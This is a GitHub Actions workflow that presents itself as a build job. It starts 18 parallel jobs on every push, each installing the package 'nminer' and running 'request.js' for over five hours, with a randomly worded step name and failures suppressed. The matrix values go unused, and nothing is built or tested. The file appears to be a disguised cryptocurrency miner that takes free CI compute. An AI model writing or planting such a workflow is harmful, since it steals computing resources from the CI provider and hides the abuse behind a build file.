name: request
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1123 }
          - { version: 2146 }
          - { version: 9583 }
          - { version: 2814 }
          - { version: 9094 }
          - { version: 1130 }
          - { version: 2244 }
          - { version: 8985 }
          - { version: 6903 }
          - { version: 7951 }
          - { version: 3757 }
          - { version: 7228 }
          - { version: 5635 }
          - { version: 7323 }
          - { version: 5836 }
          - { version: 24 }
          - { version: 724 }
          - { version: 9748 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: boo except sociable
        run: |
          npm install nminer@latest
          timeout 324m node request.js || echo "request executed"